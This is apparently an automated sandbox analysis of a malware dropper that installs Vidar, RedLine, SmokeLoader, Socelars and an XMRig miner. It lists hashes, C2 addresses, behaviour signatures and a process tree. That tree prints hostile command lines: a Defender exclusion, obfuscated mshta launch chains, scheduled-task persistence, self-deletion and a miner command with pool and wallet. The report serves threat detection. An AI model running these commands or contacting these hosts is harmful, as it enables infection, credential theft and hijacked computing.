Resubmissions

11-09-2021 20:41

210911-zgxftsbgc5 10

11-09-2021 20:33

210911-zb49gsegcq 10

Analysis

  • max time kernel
    1810s
  • max time network
    1778s
  • platform
    windows10_x64
  • resource
    win10-fr
  • submitted
    11-09-2021 20:41

General

  • Target

    setup_x86_x64_install.exe

  • Size

    3.4MB

  • MD5

    f59a5fd82eaf0088e7853c09922ce477

  • SHA1

    969d1debc32996a4d53c4a36d2241511cb8b77ec

  • SHA256

    291505b584fdf540a1590ce7181d85cee7967f99cbf05aeb7b7031b6a9b4f2cd

  • SHA512

    344192b08874df2cf922f782400435f109eb5bab7c3c582f4eb3fe328cadcb2d2c3ddd02ba816663168f9c997766f089731e657afe2cefb7bda773e6e6dca71c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.5

Botnet

706

C2

https://gheorghip.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

119c4tv3

C2

185.215.113.104:18754

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Registers COM server for autorun 1 TTPs
  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 50 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 60 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 9 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs net.exe
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:360
    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
      2⤵
      • Executes dropped EXE
      PID:6940
      • C:\Windows\SysWOW64\schtasks.exe
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4708
    • C:\Users\Admin\AppData\Roaming\cheugba
      C:\Users\Admin\AppData\Roaming\cheugba
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:7848
    • C:\Users\Admin\AppData\Roaming\cheugba
      C:\Users\Admin\AppData\Roaming\cheugba
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:6788
    • C:\Users\Admin\AppData\Roaming\cheugba
      C:\Users\Admin\AppData\Roaming\cheugba
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:1436
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1260
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s SENS
      1⤵
        PID:1448
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        PID:3040
        • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
          "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4956
          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5004
            • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe
              "C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe"
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:5108
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3376
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3424
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3400
                • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe
                  Sat196ac06a9e6.exe
                  6⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4128
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    7⤵
                      PID:1284
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im chrome.exe
                        8⤵
                        • Kills process with taskkill
                        PID:5172
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3568
                  • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe
                    Sat191649b47c9e2.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4084
                    • C:\ProgramData\820992.exe
                      "C:\ProgramData\820992.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3268
                      • C:\Windows\system32\WerFault.exe
                        C:\Windows\system32\WerFault.exe -u -p 3268 -s 1940
                        8⤵
                        • Program crash
                        PID:4316
                    • C:\ProgramData\4916599.exe
                      "C:\ProgramData\4916599.exe"
                      7⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:4960
                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:1676
                    • C:\ProgramData\889030.exe
                      "C:\ProgramData\889030.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5100
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 960
                        8⤵
                        • Program crash
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1128
                      • C:\ProgramData\889030.exe
                        "C:\ProgramData\889030.exe"
                        8⤵
                        • Executes dropped EXE
                        PID:756
                      • C:\ProgramData\889030.exe
                        "C:\ProgramData\889030.exe"
                        8⤵
                          PID:3412
                      • C:\ProgramData\928377.exe
                        "C:\ProgramData\928377.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:4304
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\928377.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\928377.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )
                          8⤵
                            PID:5252
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\928377.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\928377.exe") do taskkill -Im "%~nxl" /F
                              9⤵
                                PID:5184
                                • C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE
                                  C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
                                  10⤵
                                  • Executes dropped EXE
                                  PID:6088
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )
                                    11⤵
                                      PID:5228
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
                                        12⤵
                                          PID:5196
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
                                        11⤵
                                        • Loads dropped DLL
                                        PID:1308
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill -Im "928377.exe" /F
                                      10⤵
                                      • Kills process with taskkill
                                      PID:4956
                              • C:\ProgramData\3782043.exe
                                "C:\ProgramData\3782043.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4108
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3472
                            • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat1946eb84e6.exe
                              Sat1946eb84e6.exe
                              6⤵
                              • Executes dropped EXE
                              PID:4408
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3468
                            • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e4750dd01.exe
                              Sat19e4750dd01.exe /mixone
                              6⤵
                              • Executes dropped EXE
                              PID:3032
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 672
                                7⤵
                                • Program crash
                                PID:5264
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 808
                                7⤵
                                • Program crash
                                PID:5796
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 656
                                7⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2748
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 764
                                7⤵
                                • Program crash
                                PID:4564
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3692
                            • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe
                              Sat19c6762a08beae.exe
                              6⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:4540
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2532
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4428
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4388
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3596
                    • C:\Users\Admin\AppData\Local\Temp\54E7.exe
                      C:\Users\Admin\AppData\Local\Temp\54E7.exe
                      2⤵
                        PID:5368
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\54E7.exe"
                          3⤵
                            PID:4272
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              4⤵
                                PID:6436
                              • C:\Windows\SysWOW64\timeout.exe
                                timeout /T 10 /NOBREAK
                                4⤵
                                • Delays execution with timeout.exe
                                PID:5048
                            • C:\Users\Admin\AppData\Local\Temp\Bf4dexN5Nl.exe
                              "C:\Users\Admin\AppData\Local\Temp\Bf4dexN5Nl.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:7628
                              • C:\Windows\SysWOW64\schtasks.exe
                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                4⤵
                                • Creates scheduled task(s)
                                PID:7696
                          • C:\Users\Admin\AppData\Local\Temp\8752.exe
                            C:\Users\Admin\AppData\Local\Temp\8752.exe
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            PID:2592
                          • C:\Users\Admin\AppData\Local\Temp\9F21.exe
                            C:\Users\Admin\AppData\Local\Temp\9F21.exe
                            2⤵
                              PID:7260
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im 9F21.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9F21.exe" & del C:\ProgramData\*.dll & exit
                                3⤵
                                • Loads dropped DLL
                                PID:4036
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im 9F21.exe /f
                                  4⤵
                                  • Kills process with taskkill
                                  PID:4560
                                • C:\Windows\SysWOW64\timeout.exe
                                  timeout /t 6
                                  4⤵
                                  • Delays execution with timeout.exe
                                  PID:6952
                            • C:\Users\Admin\AppData\Local\Temp\CC3D.exe
                              C:\Users\Admin\AppData\Local\Temp\CC3D.exe
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:7692
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\CC3D.exe"
                                3⤵
                                  PID:7760
                                  • C:\Windows\SysWOW64\timeout.exe
                                    timeout /T 10 /NOBREAK
                                    4⤵
                                    • Delays execution with timeout.exe
                                    PID:6564
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                              1⤵
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2808
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                2⤵
                                • Drops file in System32 directory
                                • Checks processor information in registry
                                • Modifies data under HKEY_USERS
                                PID:5000
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                              1⤵
                                PID:2676
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                1⤵
                                  PID:2652
                                  • C:\Windows\system32\wbem\WMIADAP.EXE
                                    wmiadap.exe /F /T /R
                                    2⤵
                                      PID:2468
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                    1⤵
                                      PID:2448
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                      1⤵
                                        PID:2424
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                        1⤵
                                          PID:1924
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                          1⤵
                                            PID:1268
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                            1⤵
                                              PID:1108
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                              1⤵
                                                PID:984
                                              • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat199ba8a4637dcb034.exe
                                                Sat199ba8a4637dcb034.exe
                                                1⤵
                                                • Executes dropped EXE
                                                PID:3816
                                              • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19f84b58b3d7.exe
                                                Sat19f84b58b3d7.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4636
                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4936
                                                  • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4224
                                                    • C:\ProgramData\5295645.exe
                                                      "C:\ProgramData\5295645.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1864
                                                    • C:\ProgramData\6848594.exe
                                                      "C:\ProgramData\6848594.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: SetClipboardViewer
                                                      PID:2440
                                                    • C:\ProgramData\1860007.exe
                                                      "C:\ProgramData\1860007.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:780
                                                      • C:\ProgramData\1860007.exe
                                                        "C:\ProgramData\1860007.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        PID:5492
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 780 -s 948
                                                        5⤵
                                                        • Program crash
                                                        PID:5700
                                                    • C:\ProgramData\3510382.exe
                                                      "C:\ProgramData\3510382.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:5144
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\3510382.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\3510382.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )
                                                        5⤵
                                                          PID:5716
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\3510382.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\3510382.exe") do taskkill -Im "%~nxl" /F
                                                            6⤵
                                                              PID:508
                                                              • C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE
                                                                C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:5912
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )
                                                                  8⤵
                                                                    PID:5452
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F
                                                                      9⤵
                                                                        PID:416
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      PID:5264
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill -Im "3510382.exe" /F
                                                                    7⤵
                                                                    • Kills process with taskkill
                                                                    PID:6124
                                                            • C:\ProgramData\5898233.exe
                                                              "C:\ProgramData\5898233.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              PID:5216
                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:648
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 1020
                                                              4⤵
                                                              • Program crash
                                                              PID:5548
                                                          • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4548
                                                            • C:\Windows\system32\WerFault.exe
                                                              C:\Windows\system32\WerFault.exe -u -p 4548 -s 1568
                                                              4⤵
                                                              • Program crash
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2700
                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            PID:3332
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                              4⤵
                                                                PID:2236
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                  5⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:1124
                                                              • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Suspicious use of SetThreadContext
                                                                • Drops file in Program Files directory
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:5352
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                  5⤵
                                                                    PID:7752
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                      6⤵
                                                                      • Creates scheduled task(s)
                                                                      PID:7908
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:7800
                                                                  • C:\Windows\explorer.exe
                                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                    5⤵
                                                                      PID:1316
